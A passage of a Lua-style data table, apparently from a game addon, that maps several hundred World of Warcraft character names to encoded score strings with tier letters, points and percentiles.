["Backstab"] = "CB:97/11%CM:42/3%",
["Microdoses"] = "EB:726/92%EM:921/94%",
["Sampaqt"] = "CB:119/15%UM:395/42%",
["Bladehawk"] = "EB:560/78%EM:886/92%",
["Halkettraz"] = "EB:521/76%EM:582/77%",
["Suetsilk"] = "UB:362/45%EM:763/80%",
["Kenderey"] = "UM:265/26%",
["Bitlove"] = "EB:586/88%EM:754/90%",
["Reeps"] = "EB:680/91%SM:1040/99%",
["Darkdog"] = "CM:187/19%",
["Goodgu"] = "EB:725/92%EM:807/84%",
["Illionaire"] = "CM:150/14%",
["Shmootels"] = "RB:439/60%EM:748/81%",
["Harris"] = "RB:532/74%EM:861/90%",
["Mystusk"] = "UB:200/25%RM:558/61%",
["Senz"] = "CM:62/6%",
["Xothle"] = "UB:238/30%RM:655/72%",
["Mpire"] = "UM:398/47%",
["Picachu"] = "EB:619/80%EM:898/90%",
["Orduni"] = "RB:554/72%EM:800/83%",
["Disclexia"] = "UB:325/43%RM:659/73%",
["Spoke"] = "CB:176/21%CM:101/8%",
["Orcdad"] = "UB:343/44%RM:582/62%",
["Minster"] = "CM:222/21%",
["Yoyomah"] = "RB:418/64%RM:451/73%",
["Badtricky"] = "CB:183/22%RM:663/71%",
["Haamu"] = "CB:33/3%UM:210/40%",
["Rli"] = "CM:39/2%",
["Krrux"] = "CB:48/7%RM:413/63%",
["Mindfilet"] = "RB:502/69%EM:845/91%",
["Kilrotorr"] = "RB:347/56%EM:661/82%",
["Pwnerzoner"] = "CB:42/3%UM:86/39%",
["Lstmoknathal"] = "CB:52/5%RM:658/70%",
["Mescalero"] = "CB:39/2%RM:92/55%",
["Birbow"] = "RB:490/64%RM:694/74%",
["Jabbshot"] = "UM:446/46%",
["Coachbtw"] = "RB:435/60%EM:691/76%",
["Jasonzz"] = "CB:164/20%RM:643/67%",
["Topzy"] = "CM:29/11%",
["Rallina"] = "RB:525/73%EM:763/81%",
["Moomeansno"] = "CM:135/12%",
["Idejder"] = "CB:146/17%RM:499/55%",
["Mewarrior"] = "UB:382/48%EM:897/91%",
["Axonz"] = "CM:257/24%",
["Hubeacca"] = "UB:238/29%RM:558/59%",
["Phøbia"] = "EB:644/83%RM:652/68%",
["Oldmansarg"] = "LB:718/95%EM:882/93%",
["Dadmon"] = "EM:809/86%",
["Pocketcheck"] = "RM:671/63%",
["Takasuka"] = "RM:524/56%",
["Tricky"] = "CM:58/5%",
["Gnomejager"] = "RM:634/68%",
["Datalaforge"] = "UM:156/49%",
["Thearthemis"] = "CM:56/4%",
["Qwhisky"] = "CM:148/13%",
["Oldirishman"] = "UM:466/47%",
["Huntardiss"] = "CB:66/7%UM:462/48%",
["Narutogregg"] = "RB:461/60%RM:533/55%",
["Psike"] = "RB:498/64%RM:625/67%",
["Mafiogodx"] = "EB:728/93%LM:970/97%",
["Griks"] = "RB:487/61%EM:826/86%",
["Rwiv"] = "UM:394/42%",
["Pantheon"] = "EB:510/75%EM:551/79%",
["Svil"] = "CB:55/5%CM:230/21%",
["Tharbar"] = "CM:222/22%",
["Daggerfall"] = "CB:79/7%RM:296/58%",
["Skullpa"] = "CM:135/12%",
["Spartfarkle"] = "EB:653/84%EM:816/85%",
["Zappiy"] = "EB:608/84%EM:807/85%",
["Loveshanks"] = "UB:220/26%CM:211/21%",
["Gordo"] = "UB:374/44%EM:807/78%",
["Sharkchili"] = "CT:166/19%RB:504/72%RM:182/50%",
["Miseryy"] = "UM:439/45%",
["Gutlocker"] = "CM:48/4%",
["Rasouu"] = "EM:696/84%",
["Bust"] = "RB:536/71%RM:553/61%",
["Qcky"] = "EB:576/75%EM:824/85%",
["Nokonwud"] = "UB:401/48%EM:721/76%",
["Nitrodubs"] = "UB:161/32%EM:543/79%",
["Garrus"] = "EB:652/85%EM:893/92%",
["Ibycus"] = "EB:466/79%EM:597/81%",
["Lynnelle"] = "RB:526/67%EM:735/78%",
["Jahck"] = "RB:383/52%RM:632/67%",
["Tinytotsu"] = "EB:514/75%EM:610/79%",
["Bumfluff"] = "CM:186/18%",
["Hama"] = "EB:630/87%EM:891/94%",
["Vanthei"] = "RB:579/74%EM:826/85%",
["Pandamic"] = "RB:403/55%RM:495/54%",
["Dooban"] = "EB:645/83%EM:865/89%",
["Nikisndrs"] = "RB:478/61%RM:682/72%",
["Wrivers"] = "UB:296/33%UM:462/48%",
["Zephyrum"] = "EB:644/84%EM:865/90%",
["Sange"] = "EB:562/78%EM:815/90%",
["Azrune"] = "RB:483/63%RM:696/72%",
["Tixx"] = "SB:783/99%LM:935/96%",
["Pocketthot"] = "EB:634/87%EM:870/93%",
["Athek"] = "EB:626/81%EM:867/89%",
["Prayer"] = "EB:667/91%EM:870/93%",
["Kiht"] = "EB:538/75%RM:552/61%",
["Orchrist"] = "RB:527/69%EM:817/85%",
["Lagrave"] = "RB:517/66%EM:874/86%",
["Dinbar"] = "EB:696/93%EM:751/82%",
["Pivot"] = "UB:382/49%EM:735/77%",
["Serbakka"] = "EB:611/80%EM:914/93%",
["Morg"] = "EB:612/78%EM:936/94%",
["Zanela"] = "EB:645/87%LM:902/96%",
["Sillybunz"] = "CM:211/21%",
["Senus"] = "CB:196/24%UM:451/49%",
["Ovonic"] = "CB:33/1%UM:352/37%",
["Xiaodidi"] = "RB:461/58%EM:847/88%",
["Drakeir"] = "UB:358/48%EM:767/82%",
["Bus"] = "RM:426/66%",
["Karlos"] = "EB:602/79%EM:705/77%",
["Hutchins"] = "UB:285/31%RM:612/66%",
["Birb"] = "RB:525/73%EM:878/92%",
["Rh"] = "UB:252/32%RM:511/56%",
["Voodizzle"] = "RB:453/63%EM:785/84%",
["Pokemansgrl"] = "RB:505/70%EM:852/89%",
["Bluebeat"] = "RB:556/73%EM:789/78%",
["Mischeri"] = "RB:530/69%RM:710/74%",
["Pawnos"] = "RB:474/65%RM:594/66%",
["Yourself"] = "CB:26/0%",
["Koreanfish"] = "CB:53/5%CM:66/6%",
["Imcs"] = "CM:67/6%",
["Vitoo"] = "EB:553/77%RM:657/72%",
["Blomstershot"] = "CM:214/20%",
["Scrotötem"] = "RM:486/53%",
["Googo"] = "RM:532/58%",
["Pennynow"] = "CM:31/2%",
["Evilbuu"] = "CB:30/2%CM:147/14%",
["Blackmold"] = "UB:358/46%RM:562/58%",
["Fataliity"] = "UT:368/47%RB:467/63%RM:309/63%",
["Metä"] = "EB:618/85%EM:801/87%",
["Coldfrønt"] = "RB:445/59%RM:679/74%",
["Takkun"] = "UB:384/46%RM:652/70%",
["Mangalor"] = "CM:243/24%",
["Basophil"] = "CM:93/9%",
["Jakethesnake"] = "RB:420/57%EM:829/89%",
["Krugzz"] = "CM:56/5%",
["Cleymon"] = "CB:193/24%UM:424/46%",
["Cloaknpoak"] = "EB:660/83%EM:751/79%",
["Drfreeze"] = "CM:206/20%",
["Benmei"] = "CM:56/4%",
["Cicaktamvan"] = "CB:29/1%",
["Shaar"] = "CB:36/4%UM:162/32%",
["Blackspider"] = "CB:34/3%CM:101/10%",
["Xandyn"] = "LB:726/96%SM:982/99%",
["Nimdv"] = "UB:360/42%EM:779/82%",
["Crixsys"] = "CB:73/8%RM:504/52%",
["Smoorc"] = "UB:402/49%EM:873/90%",
["Brookie"] = "CM:144/13%",
["Seiki"] = "CT:127/17%EB:514/83%LM:687/95%",
["Babylegs"] = "CB:66/7%RM:647/63%",
["Pvmage"] = "LT:777/98%EB:635/87%LM:886/95%",
["Tabata"] = "UM:375/38%",
["Refused"] = "UB:243/43%EM:769/88%",
["Mervtheperv"] = "CM:48/4%",
["Horndog"] = "RB:532/68%RM:680/72%",
["Morendo"] = "CB:125/15%RM:486/50%",
["Ballzach"] = "CB:25/0%",
["Mydepression"] = "CT:8/11%UB:109/44%RM:260/56%",
["Zuez"] = "CB:84/8%EM:762/79%",
["Porphyrion"] = "CB:62/5%RM:469/51%",
["Holybones"] = "CB:176/21%EM:681/75%",
["Oatmeal"] = "CB:20/21%CM:60/4%",
["Nicememe"] = "EB:659/89%LM:944/97%",
["Guzum"] = "RB:309/51%EM:848/88%",
["Ellybee"] = "UB:335/43%RM:643/71%",
["Dizzyd"] = "EB:575/79%EM:791/85%",
["Freekïll"] = "RB:505/64%EM:798/83%",
["Banewlf"] = "EB:576/76%LM:943/95%",
["Lavetz"] = "CB:205/21%RM:689/73%",
["Naamtar"] = "EB:633/82%EM:886/91%",
["Shkr"] = "RB:458/61%EM:789/84%",
["Merkflare"] = "EB:549/76%EM:798/86%",
["Lunchbøx"] = "UM:458/47%",
["Powerofsinn"] = "CM:161/20%",
["Kryxus"] = "UB:273/34%RM:740/72%",
["Littlesister"] = "UB:280/34%EM:856/84%",
["Blixon"] = "EB:653/85%EM:855/87%",
["Laframba"] = "RB:335/70%EM:694/86%",
["Mordria"] = "RB:496/65%RM:668/71%",
["Zeroaggro"] = "CB:112/12%UM:280/28%",
["Magester"] = "EB:568/75%EM:790/84%",
["Arsonisst"] = "CM:54/3%",
["Mjxaep"] = "RB:531/68%EM:724/76%",
["Ogearthbound"] = "RB:337/70%EM:341/75%",
["Cowbells"] = "CB:172/20%EM:715/76%",
["Woodroow"] = "EB:581/76%EM:921/93%",
["Nocturnes"] = "CM:29/1%",
["Ashholylight"] = "RB:270/56%LM:931/97%",
["Magnetar"] = "CM:154/14%",
["Masseroth"] = "CB:43/6%UM:431/40%",
["Nhoj"] = "CM:215/20%",
["Nãri"] = "UB:367/43%EM:777/82%",
["Loadeddice"] = "RB:484/62%EM:907/92%",
["Hintok"] = "CB:158/19%RM:633/67%",
["Zugenstein"] = "UB:386/46%EM:789/75%",
["Baggels"] = "CB:103/10%UM:310/31%",
["Gadnukbow"] = "EB:641/88%EM:875/92%",
["Lunist"] = "UM:275/28%",
["Capisce"] = "RB:528/73%EM:823/89%",
["Prot"] = "RB:410/63%EM:552/75%",
["Cryssy"] = "EB:553/76%EM:884/93%",
["Tarkov"] = "CM:103/8%",
["Sephirothac"] = "RB:508/70%RM:420/65%",
["Jaden"] = "LM:986/98%",
["Peacemon"] = "EB:655/89%EM:777/84%",
["Bigkitties"] = "UB:366/49%RM:476/52%",
["Noellesilvaa"] = "CM:132/12%",
["Hyperspace"] = "UB:332/43%UM:393/42%",
["Alcohealic"] = "RB:415/70%EM:666/82%",
["Incantator"] = "CM:173/16%",
["Tebiemeow"] = "EB:569/85%EM:829/92%",
["Korrupte"] = "CB:132/15%RM:515/56%",
["Thargrum"] = "EB:690/91%EM:910/94%",
["Fillmore"] = "EB:519/76%LM:882/96%",
["Bawlcheez"] = "EB:619/90%LM:901/97%",
["Thunderbacon"] = "EB:656/89%EM:849/90%",
["Robes"] = "UB:258/33%EM:726/78%",
["Cdingo"] = "RB:425/58%RM:663/73%",
["Süllvian"] = "CB:129/15%RM:632/67%",
["Doosk"] = "RB:483/64%EM:761/82%",
["Cume"] = "CM:222/22%",
["Dazumba"] = "CB:95/11%CM:85/7%",
["Sparks"] = "EB:612/80%EM:876/90%",
["Bobbin"] = "UB:374/48%RM:705/69%",
["Balien"] = "EB:673/92%EM:741/81%",
["Thadoren"] = "EB:577/80%EM:881/92%",
["Thrin"] = "RB:584/74%EM:793/83%",
["Bataxs"] = "CM:33/1%",
["Verelle"] = "RB:525/69%RM:700/74%",
["Tunder"] = "EB:619/80%EM:889/91%",
["Nagrith"] = "EB:621/86%EM:828/89%",
["Moonless"] = "RB:460/69%EM:504/76%",
["Cheesypoofs"] = "RB:434/55%EM:802/83%",
["Montreal"] = "RB:414/50%EM:720/76%",
["Licr"] = "RB:483/72%EM:813/78%",
["Snackysmores"] = "RB:546/72%EM:894/91%",
["Reynei"] = "EB:613/81%EM:837/88%",
["Elusive"] = "EB:639/81%RM:681/72%",
["Tribubbler"] = "CB:56/4%UM:264/26%",
["Katu"] = "EB:655/91%LM:940/98%",
["Vdmin"] = "EB:666/84%LM:973/98%",
["Adrenalin"] = "RB:577/73%EM:870/86%",
["Uy"] = "EB:731/92%LM:956/97%",
["Horatius"] = "UB:274/35%RM:636/70%",
["Luminati"] = "UB:357/48%RM:571/63%",
["Mannice"] = "RB:434/57%RM:646/71%",
["Foxsenpai"] = "CB:174/20%CM:102/8%",
["Googlegnome"] = "UB:229/27%UM:402/42%",
["Reives"] = "EB:648/84%EM:837/86%",
["Jtb"] = "RB:429/71%EM:584/77%",
["Ing"] = "EB:616/81%EM:885/92%",
["Ander"] = "EB:624/79%EM:869/89%",
["Skyehawk"] = "UB:349/47%RM:641/71%",
["Ttsbank"] = "CM:28/1%",
["Rubikscraft"] = "CM:30/1%",
["Ozymandîas"] = "UB:92/35%RM:313/51%",
["Neurotic"] = "UB:230/29%RM:658/72%",
["Janeth"] = "RB:407/52%RM:534/55%",
["Ida"] = "EB:575/79%EM:775/82%",
["Bucksmash"] = "EB:624/79%EM:902/90%",
["Guhyuck"] = "EB:686/92%LM:947/97%",
["Ssjimpulsion"] = "UM:466/49%",
["Saybibber"] = "EB:645/82%EM:927/94%",
["Twosodas"] = "CB:68/7%RM:588/65%",
["Niudh"] = "UM:330/33%",
["Murichael"] = "CB:160/20%UM:281/29%",
["Yemier"] = "CM:27/0%",
["Manmuscle"] = "RM:529/56%",
["Simps"] = "RB:538/69%EM:918/93%",
["Tchamí"] = "RB:494/68%UM:440/48%",
["Bookakke"] = "CB:26/0%CM:199/19%",
["Sympathysnif"] = "EB:655/85%EM:909/94%",
["Hearthstoner"] = "UB:304/34%RM:410/63%",
["Pickledogboy"] = "CB:38/4%CM:58/5%",
["Bogarash"] = "RB:445/55%RM:578/62%",
["Kafziel"] = "UM:299/30%",
["Slamclam"] = "EB:598/79%EM:900/91%",
["Labella"] = "EB:612/84%LM:953/97%",
["Akimbobluntz"] = "RB:383/52%EM:884/93%",
["Frikag"] = "CM:187/18%",
["Shrove"] = "EM:538/76%",
["Ggetsome"] = "CB:31/2%RM:416/63%",
["Shiruke"] = "RM:538/59%",
["Hippyzilla"] = "EB:710/89%LM:972/97%",
["Mcshivdundee"] = "CB:70/8%UM:316/32%",
["Lostworld"] = "CM:102/12%",
["Wyked"] = "RB:406/51%EM:731/77%",
["Saturnite"] = "CB:32/3%CM:212/22%",
["Grocery"] = "RM:577/63%",
["Fp"] = "UB:274/35%RM:638/70%",
["Lhoko"] = "UB:353/41%EM:809/78%",
["Prickpocket"] = "RB:532/68%EM:860/88%",
["Guoo"] = "UB:244/31%RM:558/62%",
["Haultclaire"] = "RB:456/57%EM:710/75%",
["Myztiq"] = "RB:368/68%EM:842/94%",
["Davidwarren"] = "CM:60/4%",
["Budahi"] = "CB:160/19%RM:655/70%",
["Bigdaddyj"] = "RB:426/55%EM:786/82%",
["Kasa"] = "RB:487/62%LM:934/95%",
["Shôgun"] = "CM:179/16%",
["Smootheggs"] = "CM:33/4%",
["Darkestweeb"] = "EB:579/76%EM:762/77%",
["Hetu"] = "EB:704/89%LM:965/97%",
["Wowitspayday"] = "UM:474/48%",
["Uhuh"] = "CM:53/4%",
["ßlackshock"] = "CM:54/4%",
["Hzcc"] = "CM:105/9%",
["Ayen"] = "RM:378/60%",
["Candlelight"] = "CB:76/8%CM:205/20%",
["Fayer"] = "CM:26/0%",
["Panzuraider"] = "CB:77/9%UM:314/31%",
["Keeva"] = "UB:54/36%UM:367/39%",
["Visiana"] = "EB:568/78%EM:842/88%",
["Valerian"] = "CB:185/22%RM:486/54%",
["Jaguardtm"] = "RB:460/69%EM:735/86%",
["Killmatic"] = "UB:296/38%UM:418/45%",
["Malmi"] = "EB:461/76%EM:761/90%",
["Guklex"] = "RB:488/72%EM:731/86%",
["Dagege"] = "UM:413/45%",
["Hmiily"] = "CM:169/15%",
["Yilingoldzu"] = "RM:584/57%",
["Mochax"] = "UM:364/38%",
["Mushen"] = "EB:653/89%EM:814/88%",
["Sunnshine"] = "CM:136/13%",
["Zuberyht"] = "UM:459/48%",
["Mikejames"] = "EB:647/88%EM:802/86%",
["Chapoguzman"] = "UB:204/25%CM:98/7%",
["Owu"] = "CB:26/20%UM:191/39%",
["Dankfrank"] = "UB:364/49%RM:658/72%",
["Ilaughulose"] = "RB:424/56%EM:791/80%",
["Nostealth"] = "CM:39/2%",
["Oshino"] = "CB:225/24%EM:739/78%",
["Milklol"] = "CB:28/1%CM:148/14%",
["Dotmonsune"] = "EB:600/78%RM:625/65%",
["Tinabelch"] = "CB:147/17%",
["Swedishchef"] = "EB:563/75%EM:772/83%",
["Marcanneto"] = "EM:378/78%",
["Umezawa"] = "UB:367/43%RM:746/70%",
["Valp"] = "CB:124/15%UM:278/28%",
["Fekk"] = "EB:686/87%LM:983/98%",
["Pingping"] = "CM:56/5%",
["Xilver"] = "UB:263/32%RM:480/51%",
["Líghtníng"] = "CM:108/13%",
["Symbolic"] = "EB:699/92%LM:869/95%",
["Jaminz"] = "RB:435/57%EM:779/83%",
["August"] = "CT:104/18%RB:562/72%EM:803/84%",
["Cárini"] = "CB:154/18%UM:449/49%",
["Phlexz"] = "CB:74/9%RM:742/73%",
["Yawn"] = "CM:217/22%",
["Theshaman"] = "UB:243/31%LM:953/97%",
["Catchmyfade"] = "UM:286/29%",
["Kaiser"] = "UB:236/25%EM:559/80%",
["Johnwgacy"] = "UM:417/43%",
["Ioop"] = "UB:338/43%RM:598/62%",
["Loafingmage"] = "UB:329/43%RM:617/68%",
["Darkbringer"] = "CM:72/5%",
["Moctavia"] = "CB:35/3%",
["Charpcharp"] = "UM:285/29%",
["Osmosi"] = "CM:123/12%",
["Etnamagi"] = "RB:540/72%EM:825/87%",
["Exanimation"] = "CB:181/19%RM:580/62%",
["Chantsnports"] = "CB:32/2%CM:148/14%",
["Vossfloss"] = "CM:40/2%",
["Dlcknlpples"] = "RM:524/58%",
["Tankforgold"] = "RM:472/68%",
["Terrapt"] = "RB:450/62%EM:782/85%",
["Wilderrose"] = "CM:249/24%",
["Legolasdaone"] = "CM:67/5%",
["Jigoro"] = "RM:221/53%",
["Mwerte"] = "CB:114/14%EM:786/77%",
["Rindhaus"] = "CM:70/12%",
["Alirus"] = "CM:37/2%",
["Eldertea"] = "CM:128/11%",
["Snobden"] = "UB:230/29%RM:537/53%",
["Alchemi"] = "RB:514/71%EM:703/77%",
["Barbs"] = "UM:373/38%",
["Gritzangravy"] = "UM:384/39%",
["Tcz"] = "UB:303/38%RM:605/64%",
["Jojonbo"] = "RB:526/67%EM:838/82%",
["Murdernation"] = "CM:132/13%",
["Butterudder"] = "UB:218/26%RM:505/56%",
["Yoolang"] = "UM:311/32%",
["Meadmaker"] = "UB:240/29%UM:375/39%",
["Tinkytink"] = "CM:216/21%",
["Crocodundee"] = "UM:249/25%",
["Dúck"] = "CB:61/7%UM:343/34%",
["Bellariss"] = "RB:441/60%EM:805/87%",
["Dinklë"] = "CM:173/16%",
["Eldina"] = "RB:528/73%EM:737/81%",
["Farside"] = "UM:430/46%",
["Malevolance"] = "EB:703/92%LM:873/95%",
["Highlypotent"] = "CB:96/11%RM:703/74%",
["Kurotaka"] = "RB:449/59%RM:565/60%",
["Zelm"] = "CM:216/22%",
["Epsteindkh"] = "EB:560/78%RM:616/68%",
["Oak"] = "RB:459/61%EM:706/77%",
["Faltester"] = "CM:105/9%",
["Chadaria"] = "EM:540/78%",
["Biggcat"] = "CB:41/3%",
["Glorina"] = "CB:47/4%UM:404/43%",
["Truedawn"] = "CM:130/11%",
["Schmoozle"] = "CM:70/7%",
["Appendixes"] = "CB:34/2%RM:121/51%",
["Blades"] = "UM:388/40%",
["Minoru"] = "UB:326/43%UM:418/46%",
["Imgeh"] = "CM:126/11%",
["Ery"] = "UM:304/31%",
["Arched"] = "RB:405/52%RM:585/62%",
["Kittenninja"] = "CM:130/19%",
["Darthsin"] = "CM:199/20%",
["Chepito"] = "RM:322/59%",
["Cypenzo"] = "EB:591/86%EM:769/87%",
["Jaxsi"] = "EB:644/82%EM:941/94%",
["Ahjiang"] = "EB:711/89%LM:951/96%",
["Luncharino"] = "EB:689/88%LM:955/96%",
["Seraed"] = "RB:190/58%EM:836/93%",
["Kayrah"] = "RM:663/69%",
["Clíck"] = "RM:511/56%",
["Drewwbrees"] = "CM:67/4%",
["Maximoof"] = "UM:343/36%",
["Koosies"] = "CM:29/1%",
["Strand"] = "UB:252/32%UM:354/37%",
["Darkdiver"] = "RB:490/65%EM:911/94%",
["Dirkmcgurk"] = "CB:192/23%RM:539/59%",
["Somechanges"] = "UM:388/39%",
["Basslocktar"] = "UM:325/33%",
["Goobear"] = "EB:625/81%EM:775/80%",
["Roguemommy"] = "RB:488/64%LM:942/95%",
["Magegodz"] = "EB:619/81%EM:789/84%",
["Zyyra"] = "CB:52/5%CM:68/10%",
["Finalhour"] = "UB:331/43%RM:727/74%",
["Silentlock"] = "CM:129/13%",
["Smackslips"] = "CM:171/21%",
["Poca"] = "UM:455/49%",
["Emilo"] = "CM:169/16%",
["Mofftarkin"] = "RM:650/69%",
["Kasatka"] = "CB:122/15%UM:200/29%",
["Fcshen"] = "UB:286/37%RM:510/56%",
["Bromann"] = "EB:587/76%EM:845/87%",
["Deathwìsh"] = "RM:691/72%",
["Lymwater"] = "UB:320/41%RM:462/50%",
["Intox"] = "EM:711/75%",
["Katomegumi"] = "EB:579/80%EM:720/79%",
["Expelliarmus"] = "UB:241/30%EM:730/79%",
["Sierest"] = "CB:159/18%RM:631/70%",
["Arees"] = "RB:349/71%RM:415/70%",
["Yurreal"] = "RB:538/71%EM:837/86%",
["Mitchypoo"] = "RB:519/72%EM:776/84%",
["Blackexecute"] = "UB:298/33%RM:483/51%",
["Xelkug"] = "RM:476/69%",
["Applewu"] = "RM:478/52%",
["Lilmimi"] = "UM:266/25%",
["Lamparkhole"] = "CB:29/1%CM:154/15%",
["Diavell"] = "RB:445/57%EM:707/75%",
["Nvrcalmetank"] = "RB:437/54%EM:731/77%",
["Ghostyghost"] = "CM:60/5%",
["Miehsellih"] = "CB:105/12%UM:311/32%",
["Loottoilet"] = "UB:308/39%RM:625/65%",
["Epikuros"] = "EB:574/75%EM:746/78%",
["Chickfillb"] = "CM:120/10%",
["Redwalker"] = "UB:207/38%RM:460/67%",
["Dasmom"] = "CB:93/11%CM:161/15%",
["Dseven"] = "UB:375/48%RM:658/68%",
["Gygyggy"] = "EB:618/84%EM:789/82%",
["Clipeum"] = "RB:518/66%RM:603/65%",
["Yomomma"] = "EB:616/85%EM:791/92%",
["Freezybones"] = "CB:91/10%RM:459/50%",
["Jukethebrute"] = "RB:132/51%CM:151/13%",
["Iamrage"] = "UB:346/40%RM:555/59%",
["Lfyah"] = "CM:69/6%",
["Jimmybug"] = "RB:393/54%RM:670/74%",
["Sasin"] = "RM:573/52%",
["Smokymcpot"] = "RM:501/52%",
["Jackiejun"] = "CB:28/1%CM:53/3%",
["Firstplace"] = "EB:624/79%SM:1010/99%",
["Clerpew"] = "UM:395/42%",
["Recluz"] = "CM:185/17%",
["Lovechain"] = "RB:409/56%EM:822/87%",
["Eschere"] = "RB:249/63%RM:335/65%",
["Icyhawtx"] = "EM:765/82%",
["Mememage"] = "UM:293/30%",
["Altmage"] = "CM:151/14%",
["Thund"] = "RB:478/60%UM:299/30%",
["Mavoeh"] = "RB:568/72%EM:855/88%",
["Drj"] = "UM:268/27%",
["Grahart"] = "EB:584/80%EM:869/92%",
["Tiggs"] = "RB:559/71%RM:661/71%",
["Pokeyabutt"] = "RM:705/74%",
["Pi"] = "RM:455/52%",
["Jamonz"] = "RM:114/50%",
["Valkyrae"] = "UM:312/40%",
["Devilian"] = "UB:362/48%RM:665/72%",
["Cantonson"] = "CM:197/19%",
["Jimvisible"] = "RM:616/66%",
["Smackbacked"] = "EB:606/77%LM:945/96%",
["Sedale"] = "CM:207/19%",
["Gizmosys"] = "RB:407/56%EM:678/75%",
["Kchewy"] = "EB:539/75%EM:875/92%",
["Maklor"] = "EB:723/91%LM:970/98%",
["Kunoiichi"] = "UB:289/35%RM:628/67%",
["Doomerfap"] = "UB:374/44%RM:324/54%",
["Akibaa"] = "CM:50/0%",
["Silvia"] = "CB:152/18%UM:445/47%",
["Lonzothrall"] = "UB:341/43%RM:512/51%",
["Tekyo"] = "CB:125/15%RM:521/55%",
["Ghadd"] = "CB:27/1%UM:503/49%",
["Koji"] = "EB:706/90%LM:979/98%",
["Vämpy"] = "CM:123/10%",
["Aewix"] = "CM:240/23%",
["Xtria"] = "EB:564/80%EM:895/89%",
["Mybigblack"] = "RB:490/64%EM:739/78%",
["Lamean"] = "UM:308/31%",
["Rever"] = "RB:390/50%EM:848/85%",
["Silvs"] = "RB:395/51%EM:827/82%",
["Havenfire"] = "EB:578/80%RM:548/60%",
["Syn"] = "EB:619/80%EM:863/87%",
["Dendrophile"] = "RB:271/65%EM:676/82%",
["Bewm"] = "EB:658/86%EM:918/94%",
["Ronzey"] = "CB:69/8%RM:567/61%",
["Attics"] = "EB:640/84%EM:866/90%",
["Yudbones"] = "CM:88/7%",
["Angrychef"] = "UB:257/33%RM:505/55%",
["Jaxxes"] = "CB:186/23%RM:629/67%",
["Yadum"] = "UM:346/43%",
["Kakoine"] = "UM:390/39%",
["Cronomage"] = "UM:377/40%",
["Prophetess"] = "RB:574/73%EM:736/77%",
["Ahnnyeong"] = "RM:605/65%",
["Whiteisrite"] = "EB:709/89%EM:836/86%",
["Zoomie"] = "EB:521/82%EM:603/76%",
["Tsengjs"] = "CB:91/10%UM:393/42%",
["Respire"] = "CM:94/11%",
["Tankmedaddy"] = "RB:392/61%RM:377/68%",
["Madwar"] = "RB:397/62%UM:142/28%",
["Butchermrc"] = "RB:420/51%RM:615/66%",
["Twohigh"] = "UB:266/34%EM:729/80%",
["Raman"] = "UM:74/27%",
["Jabshot"] = "RB:450/56%RM:686/63%",
["Krint"] = "CB:94/9%RM:464/50%",
["Loriberenson"] = "CM:30/1%",
["Suppadooka"] = "CB:114/12%UM:403/41%",
["Ishraneq"] = "CB:149/18%RM:646/67%",
["Swagganaut"] = "CM:29/2%",
["Benefit"] = "CB:50/5%RM:673/70%",
["Tawo"] = "CB:76/9%UM:383/39%",
["Dominaro"] = "RB:488/65%EM:828/84%",
["Bleys"] = "UB:207/26%RM:520/57%",
["Thecity"] = "RB:328/54%EM:624/83%",
["Huckleberri"] = "UB:228/27%RM:551/59%",
["Hammahdolo"] = "CB:189/23%CM:243/24%",
["Thyon"] = "UB:274/30%UM:342/34%",
["Talqx"] = "UM:401/41%",
["Lihaima"] = "RB:435/57%RM:675/74%",
["Etziø"] = "EB:632/80%EM:900/90%",
["Rhainer"] = "RB:510/71%EM:724/79%",
["Aspect"] = "EB:634/82%EM:885/90%",
["Killdare"] = "RB:220/51%RM:213/53%",
["Drauka"] = "RB:495/64%EM:885/88%",
["Pindar"] = "RB:567/72%EM:771/81%",
["Klutzycactus"] = "UB:345/46%RM:503/55%",
["Scorpius"] = "CM:26/0%",
["Shingy"] = "UB:387/49%EM:761/80%",
["Blackmamba"] = "UB:306/37%RM:692/73%",
["Brritos"] = "UB:347/45%EM:730/79%",
["Mugu"] = "RB:375/51%RM:574/64%",
["Arcos"] = "CM:234/23%",
["Daldo"] = "RB:433/56%RM:665/69%",
["Vazzi"] = "CB:76/8%CM:255/24%",
["Tardrova"] = "UM:421/43%",
["Cryx"] = "UM:249/25%",
["Ariellarx"] = "CB:195/24%RM:631/65%",
["Mythikz"] = "RB:396/52%RM:619/68%",
["Devox"] = "UB:283/36%UM:379/40%",
["Deathakiss"] = "RB:482/63%EM:907/92%",
["Dreadknot"] = "RB:515/65%EM:799/83%",
["Tranzcendent"] = "RB:409/52%EM:735/77%",
["Blowhole"] = "RB:444/58%RM:750/73%",
["Tier"] = "RB:496/69%LM:916/96%",
["Stromspirit"] = "CB:116/14%UM:268/27%",
["Zmmr"] = "CM:50/0%",
["Thornaxe"] = "UB:361/42%RM:644/71%",
["Scootersav"] = "UB:351/45%EM:725/76%",
["Kxq"] = "CM:171/18%",
["Xiaoke"] = "CM:237/24%",
["Primordial"] = "UB:243/31%RM:491/54%",
["Goreclaw"] = "UM:387/42%",
["Fallenhq"] = "UB:305/40%UM:442/48%",
["Reckt"] = "EB:605/84%EM:746/87%",
["Yamahaw"] = "UM:325/36%",
["Woosauce"] = "EB:578/79%RM:628/70%",
["Greath"] = "CB:184/22%RM:526/56%",
["Luuper"] = "RB:396/52%RM:676/70%",
["Ändreas"] = "EB:727/93%LM:992/98%",
["Tsukihime"] = "RB:492/63%EM:806/83%",
["Dyatlovv"] = "CB:85/9%CM:96/11%",
["Nikaea"] = "CM:84/10%",
["Aero"] = "RB:534/74%RM:617/68%",
["Falkonhoof"] = "CB:74/7%CM:36/2%",
["Zapnfap"] = "CM:62/4%",
["Gzyo"] = "CM:28/1%",
["Helvetes"] = "CB:72/8%CM:159/15%",
["Xi"] = "RM:480/50%",
["Hornde"] = "RM:337/65%",
["Classicsix"] = "EB:622/79%EM:892/91%",
["Boomdiggity"] = "RB:466/64%EM:843/88%",
["Bauneshock"] = "RB:420/54%RM:624/65%",
["Goone"] = "EB:719/92%LM:999/98%",
["Roan"] = "EB:550/85%LM:853/95%",
["Eøs"] = "CB:124/13%CM:200/19%",
["Gonlaren"] = "CB:203/24%UM:261/46%",
["Absens"] = "UT:362/47%UB:329/45%RM:568/67%",
["Chunkadin"] = "EB:542/75%EM:735/78%",
["Äyemage"] = "RB:393/52%RM:657/72%",
["Coasters"] = "EB:694/91%LM:947/97%",
["Nave"] = "RB:574/73%EM:937/94%",
["Hersh"] = "EB:682/86%LM:959/97%",
["Slapjacks"] = "UM:365/45%",
["Hyuckhyuck"] = "EB:615/80%EM:845/84%",
["Excessive"] = "RB:401/54%RM:607/67%",
["Furryboots"] = "EB:598/82%EM:819/85%",
["Stromila"] = "RM:473/69%",
["Comeallover"] = "UB:316/41%RM:480/53%",
